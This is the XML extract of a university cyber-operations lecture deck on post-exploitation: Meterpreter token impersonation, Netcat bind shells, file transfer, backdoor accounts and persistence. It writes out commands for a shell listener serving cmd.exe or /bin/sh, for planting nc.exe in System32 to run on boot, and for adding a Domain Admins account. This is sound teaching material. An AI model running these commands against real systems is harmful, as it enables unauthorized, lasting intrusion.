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5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81847" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="15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Cyber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 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" b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Domain Token Stealing	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Backdoors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Many exploits are fleeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They work and provide access only as long as the program that was exploited remains running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reboot, service restarted, etc. and you’re out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Migrate your shell to a permanent home by the use of a backdoor (like persistence.rb)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5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Netcat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Simple tool that allows communication and network traffic to flow between two hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Transfer files, conduct port scans, instant messaging, web server, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TCP/UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Functions in client or server mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can connect to any port on your client/server machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Really is the Swiss army knife of network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5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Netcat: the Swiss army knife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Setting up a listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc -l -p 1337 on one machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc invokes the Netcat program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-l (lower case L) sets Netcat to listener mode. On windows -L keeps the listener open even after a client disconnects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-p specify the port number to listen on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executing connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From another (different machine) nc 192.168.18.132 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Able to send keyboard strokes between two sessions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Close connection by issuing CTRL+C key combination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6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Netcat: transferring files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Easy to do with Meterpreter shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But do not want to depend on having Meterpreter shell all the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>With Netcat running on the target machine issue command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc -l -p 7777 &gt; virus.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Forces target to listen for connection and stores input in virus.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From local machine make connection and specify file to send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Begin upload process by issuing command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc 172.16.45.129 7777 &lt; virus.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netcat provides no indicator the file has finished uploading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wait several seconds before CRTL+C out of connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Identifying ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When Nessus or Nmap fail, try connecting through Netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sending keyboard strokes through connection can elicit responses which help identify service running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7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Netcat: binding to process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Why bind to process?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Execute and interact with the bound program as if at the machine itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-e switch: execute whatever program specified on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc -l -p 12345 -e /bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Whoever connects to port 12345 will be served up a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>On windows a similar command is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nc.exe -L -p 12345 -e c:\Windows\System32\cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Windows machine has been successfully exploited, now need to maintain access. Netcat would need to be uploaded to System32 directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploited with Meterpreter, so can upload files to remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Meterpreter &gt; upload nc.exe c:\\windows\\system32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Once uploaded need to configure server to listen for connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Meterpreter &gt; nc -L -p 5777 -e cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0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Netcat Exploit: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Upload the netcat listener to the target Windows machine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r>
              <a:rPr lang="en-US"/>
              <a:t>Have it netcat start up on boot and listen on port 445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522753"/>
            <a:ext cx="7924800" cy="84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27768"/>
            <a:ext cx="5186282" cy="225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3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Netcat Exploit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Reboot the system and see if it works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7" y="2559077"/>
            <a:ext cx="59150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Netcat Firewall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may need to allow a port open through the firewall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56" y="2711814"/>
            <a:ext cx="3558395" cy="28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Netcat Firewall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2460437"/>
            <a:ext cx="73533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6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Persistence With persistence.rb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Configure our options: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80" y="2528564"/>
            <a:ext cx="4458614" cy="1722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80" y="4332745"/>
            <a:ext cx="5955055" cy="15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6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completion of this unit, students will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform a token stealing privilege escalation exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transfer files to and from a machine with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the different types of tokens that may be used for impersonation as opposed to delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use domain tokens to establish persistence on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a remote system.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back into the box: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3" y="2290601"/>
            <a:ext cx="44100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 for the user to log back in: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505075"/>
            <a:ext cx="65913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 Your Tokens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is an ok idea for highly secure accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Should be no adverse side effects from enabling this setting because it's very unlikely you will need to access these multi-tier applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Don’t do this for everyday users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It will cause some applications to be a huge pain to use (e.g. SharePoint)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89" y="1628179"/>
            <a:ext cx="3088982" cy="37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 your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Setting disabled the ability to steal a delegate-level token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An impersonate-level token will still be available to an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Local privilege escalation vulnerability on the compromised machine</a:t>
            </a:r>
          </a:p>
          <a:p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Tokens are just like web cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They are a temporary key that allows you to access the system and network without having to provide credentials each time you access a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Delegate - ‘interactive’ logons, such as logging into the machine, or connecting to it via remote desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Impersonate - ‘non-interactive’ sessions, such as attaching a network drive, or a domain logon script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They persist until a reboot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When a user logs off, their delegate token is reported as a impersonate token, but will still hold all of the rights of a delegate token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0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Incognito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Application that allowed you to impersonate user tokens when successfully compromising a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Same way cookie stealing works, by replaying that temporary key when asked to authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Once you have a Meterpreter console, you can impersonate valid tokens on the system and become that specific user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Never have to worry about credentials or for that matter even hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Local and/or domain privilege escalation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Performing the Exploit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Gain a meterpreter shell somehow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Load the module into your meterpreter session: use incognito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859" y="2984392"/>
            <a:ext cx="4320894" cy="27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6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Performing the Exploit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Identify if there are any valid tokens on this system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SYSTEM is king</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Administrators don’t have access to all the tokens either, but they do have the ability to migrate to SYSTEM processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Impersonate the token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211" y="2169197"/>
            <a:ext cx="2819400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436" y="4238525"/>
            <a:ext cx="40671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3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Performing the Exploit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Check to make sure everything was successful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8" y="3008609"/>
            <a:ext cx="27908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can have an account now too!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WINDOWS: Add a domain user and put them in Domain Admins group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>net user username password /ADD /DOMAIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>net group "Domain Admins" username /ADD /DOMAIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>WINDOWS: Add a local user and put them local Administrators group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>net user username password /ADD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>net localgroup Administrators username /ADD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3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You’ve come this far, don’t lose your access!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After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the service you exploited is down or patched, you can still gain access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted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0340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2128</TotalTime>
  <Words>1092</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>120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Mangal</vt:lpstr>
      <vt:lpstr>PP_C5Modules_CC_License_standard</vt:lpstr>
      <vt:lpstr>Cyber Operations</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Tokens</vt:lpstr>
      <vt:lpstr>Incognito</vt:lpstr>
      <vt:lpstr>Performing the Exploit</vt:lpstr>
      <vt:lpstr>Performing the Exploit</vt:lpstr>
      <vt:lpstr>Performing the Exploit</vt:lpstr>
      <vt:lpstr>You can have an account now too!</vt:lpstr>
      <vt:lpstr>You’ve come this far, don’t lose your access!</vt:lpstr>
      <vt:lpstr>Backdoors</vt:lpstr>
      <vt:lpstr>Netcat </vt:lpstr>
      <vt:lpstr>Netcat: the Swiss army knife</vt:lpstr>
      <vt:lpstr>Netcat: transferring files</vt:lpstr>
      <vt:lpstr>Netcat: binding to process</vt:lpstr>
      <vt:lpstr>Netcat Exploit:</vt:lpstr>
      <vt:lpstr>Netcat Exploit</vt:lpstr>
      <vt:lpstr>Netcat Firewall Changes</vt:lpstr>
      <vt:lpstr>Netcat Firewall Changes</vt:lpstr>
      <vt:lpstr>Get Persistence With persistence.rb</vt:lpstr>
      <vt:lpstr>Getting back into the box:</vt:lpstr>
      <vt:lpstr>Wait for the user to log back in:</vt:lpstr>
      <vt:lpstr>Protect Your Tokens </vt:lpstr>
      <vt:lpstr>Protect your Tokens</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>University of California at Davis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Ham, Michael</cp:lastModifiedBy>
  <cp:revision>192</cp:revision>
  <cp:lastPrinted>2016-07-18T16:40:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-07-03T20:12:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-14T15:36:13Z</dcterms:modified>
</cp:coreProperties>
</file>